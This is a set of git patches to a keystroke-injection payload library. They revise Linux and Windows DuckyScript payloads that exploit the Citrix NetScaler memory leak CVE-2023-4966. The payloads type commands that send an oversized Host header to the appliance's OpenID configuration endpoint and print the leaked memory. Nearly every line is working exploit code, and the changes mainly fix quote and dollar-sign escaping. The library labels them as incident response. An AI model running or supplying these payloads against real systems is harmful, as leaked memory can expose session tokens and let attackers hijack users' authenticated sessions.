QUACK ENTER QUACK DELAY 500 -QUACK STRING if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then +QUACK STRING if [ $? -eq 0 ] && [ \"$(echo $response | cut -c 1-3)\" == \"200\" ]; then QUACK ENTER QUACK DELAY 500 -QUACK STRING echo "--- Dumped memory ---" +QUACK STRING echo \"--- Dumped memory ---\" QUACK ENTER QUACK DELAY 500 -QUACK STRING echo "$response" | cut -c 131051- +QUACK STRING echo \"$response\" | cut -c 131051- QUACK ENTER QUACK DELAY 500 -QUACK STRING echo "--- End ---" +QUACK STRING echo \"--- End ---\" QUACK ENTER QUACK DELAY 500 QUACK STRING else QUACK ENTER QUACK DELAY 500 -QUACK STRING echo "Could not dump memory" +QUACK STRING echo \"Could not dump memory\" QUACK ENTER QUACK DELAY 500 QUACK STRING fi From fd03dfda79b4789f5e86848108318bede0a64c51 Mon Sep 17 00:00:00 2001 From: Aleff Date: Sun, 9 Jun 2024 12:05:56 +0200 Subject: [PATCH 5/6] Update win-payload.txt --- .../win-payload.txt | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/win-payload.txt b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/win-payload.txt index 1a2efae1b..5bacf0d8f 100644 --- a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/win-payload.txt +++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/win-payload.txt @@ -3,7 +3,7 @@ * REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 # * REM # Author : Aleff # * REM # Version : 1.0 # -* REM # Category : incident-response # +* REM # Category : incident-response # * REM # Target : Citrix NetScaler ADV; NetScaler Gateway # * REM # # * REM ################################################################################## @@ -23,35 +23,35 @@ QUACK DELAY 1000 QUACK STRING $header_value = 'a' * 24576 QUACK ENTER QUACK DELAY 500 -QUACK STRING $header_value = $header_value -replace "\n", "" +QUACK STRING $header_value = $header_value -replace \"\n\", \"\" QUACK ENTER QUACK DELAY 500 -QUACK STRING $headers="-H 'Host:$header_value'" +QUACK STRING $headers=\"-H 'Host:$header_value'\" QUACK ENTER QUACK DELAY 500 QUACK STRING $headers = @{'Host' = $header_value} QUACK ENTER QUACK DELAY 500 -QUACK STRING $uri = "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration" +QUACK STRING $uri = \"https://$HOSTNAME/oauth/idp/.well-known/openid-configuration\" QUACK ENTER QUACK DELAY 500 QUACK STRING $response = Invoke-RestMethod -Uri $uri -Headers $headers -Method GET -TimeoutSec 10 QUACK ENTER QUACK DELAY 500 -QUACK STRING if ($response.Substring(0, 3) -eq "200") { +QUACK STRING if ($response.Substring(0, 3) -eq \"200\") { QUACK ENTER QUACK DELAY 500 -QUACK STRING Write-Host "--- Dumped memory ---" +QUACK STRING Write-Host \"--- Dumped memory ---\" QUACK ENTER QUACK DELAY 500 QUACK STRING $response.Substring(131050) # 131051 - 1 QUACK ENTER QUACK DELAY 500 -QUACK STRING Write-Host "--- End ---" +QUACK STRING Write-Host \"--- End ---\" QUACK ENTER QUACK DELAY 500 QUACK STRING } else { QUACK ENTER QUACK DELAY 500 -QUACK STRING Write-Host "Could not dump memory"} -QUACK ENTER \ No newline at end of file +QUACK STRING Write-Host \"Could not dump memory\"} +QUACK ENTER From 463acb855952786f09959f48163c08264ec8a8fe Mon Sep 17 00:00:00 2001 From: Aleff Date: Tue, 11 Jun 2024 08:13:22 +0200 Subject: [PATCH 6/6] $ -> \$ --- .../lin-payload.txt | 30 +++++++-------- .../win-payload.txt | 38 +++++++++---------- 2 files changed, 34 insertions(+), 34 deletions(-) diff --git a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt index 49a60d6c4..754c0f768 100644 --- a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt +++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt @@ -1,38 +1,38 @@ -* REM ################################################################################## -* REM # # -* REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 # -* REM # Author : Aleff # -* REM # Version : 1.0 # -* REM # Category : incident-response # -* REM # Target : Citrix NetScaler ADV; NetScaler Gateway # -* REM # # -* REM ################################################################################## +################################################################################# +# # +# Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 # +# Author : Aleff # +# Version : 1.0 # +# Category : incident-response # +# Target : Citrix NetScaler ADV; NetScaler Gateway # +# # +################################################################################# ATTACKMODE HID QUACK REM VARIABLES -* REM 1) Define replacing into the $HOSTNAME var your target, so put here the Citrix ADC / Gateway target, excluding the protocol. +# 1) Define replacing into the HOSTNAME var your target, so put here the Citrix ADC / Gateway target, excluding the protocol. HOSTNAME='192.168.1.200' QUACK DELAY 3000 QUACK CTRL-ALT t QUACK DELAY 1000 -QUACK STRING header_value=$(yes a | head -n 24576 | tr -d '\n') +QUACK STRING header_value=\$(yes a | head -n 24576 | tr -d '\n') QUACK ENTER QUACK DELAY 500 -QUACK STRING headers=\"-H 'Host:$header_value'\" +QUACK STRING headers=\"-H 'Host:\$header_value'\" QUACK ENTER QUACK DELAY 500 -QUACK STRING response=$(curl -s -k -H \"$headers\" \"https://$HOSTNAME/oauth/idp/.well-known/openid-configuration\" --connect-timeout 10) +QUACK STRING response=\$(curl -s -k -H \"\$headers\" \"https://$HOSTNAME/oauth/idp/.well-known/openid-configuration\" --connect-timeout 10) QUACK ENTER QUACK DELAY 500 -QUACK STRING if [ $? -eq 0 ] && [ \"$(echo $response | cut -c 1-3)\" == \"200\" ]; then +QUACK STRING if [ \$? -eq 0 ] && [ \"\$(echo \$response | cut -c 1-3)\" == \"200\" ]; then QUACK ENTER QUACK DELAY 500 QUACK STRING echo \"--- Dumped memory ---\" QUACK ENTER QUACK DELAY 500 -QUACK STRING echo \"$response\" | cut -c 131051- +QUACK STRING echo \"\$response\" | cut -c 131051- QUACK ENTER QUACK DELAY 500 QUACK STRING echo \"--- End ---\" diff --git a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/win-payload.txt b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/win-payload.txt index 5bacf0d8f..b8a6800a9 100644 --- a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/win-payload.txt +++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/win-payload.txt @@ -1,50 +1,50 @@ -* REM ################################################################################## -* REM # # -* REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 # -* REM # Author : Aleff # -* REM # Version : 1.0 # -* REM # Category : incident-response # -* REM # Target : Citrix NetScaler ADV; NetScaler Gateway # -* REM # # -* REM ################################################################################## +################################################################################## +# # +# Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 # +# Author : Aleff # +# Version : 1.0 # +# Category : incident-response # +# Target : Citrix NetScaler ADV; NetScaler Gateway # +# # +################################################################################## ATTACKMODE HID QUACK REM VARIABLES -* REM 1) Define replacing into the $HOSTNAME var your target, so put here the Citrix ADC / Gateway target, excluding the protocol. +#1) Define replacing into the HOSTNAME var your target, so put here the Citrix ADC / Gateway target, excluding the protocol. HOSTNAME='192.168.1.200' -QUACK DELAY 3000 +QUACK DELAY 1500 QUACK GUI r QUACK DELAY 500 QUACK STRING powershell QUACK ENTER QUACK DELAY 1000 -QUACK STRING $header_value = 'a' * 24576 +QUACK STRING \$header_value = 'a' * 24576 QUACK ENTER QUACK DELAY 500 -QUACK STRING $header_value = $header_value -replace \"\n\", \"\" +QUACK STRING \$header_value = \$header_value -replace \"\n\", \"\" QUACK ENTER QUACK DELAY 500 -QUACK STRING $headers=\"-H 'Host:$header_value'\" +QUACK STRING \$headers=\"-H 'Host:\$header_value'\" QUACK ENTER QUACK DELAY 500 -QUACK STRING $headers = @{'Host' = $header_value} +QUACK STRING \$headers = @{'Host' = \$header_value} QUACK ENTER QUACK DELAY 500 -QUACK STRING $uri = \"https://$HOSTNAME/oauth/idp/.well-known/openid-configuration\" +QUACK STRING \$uri = \"https://$HOSTNAME/oauth/idp/.well-known/openid-configuration\" QUACK ENTER QUACK DELAY 500 -QUACK STRING $response = Invoke-RestMethod -Uri $uri -Headers $headers -Method GET -TimeoutSec 10 +QUACK STRING \$response = Invoke-RestMethod -Uri \$uri -Headers \$headers -Method GET -TimeoutSec 10 QUACK ENTER QUACK DELAY 500 -QUACK STRING if ($response.Substring(0, 3) -eq \"200\") { +QUACK STRING if (\$response.Substring(0, 3) -eq \"200\") { QUACK ENTER QUACK DELAY 500 QUACK STRING Write-Host \"--- Dumped memory ---\" QUACK ENTER QUACK DELAY 500 -QUACK STRING $response.Substring(131050) # 131051 - 1 +QUACK STRING \$response.Substring(131050) # 131051 - 1 QUACK ENTER QUACK DELAY 500 QUACK STRING Write-Host \"--- End ---\"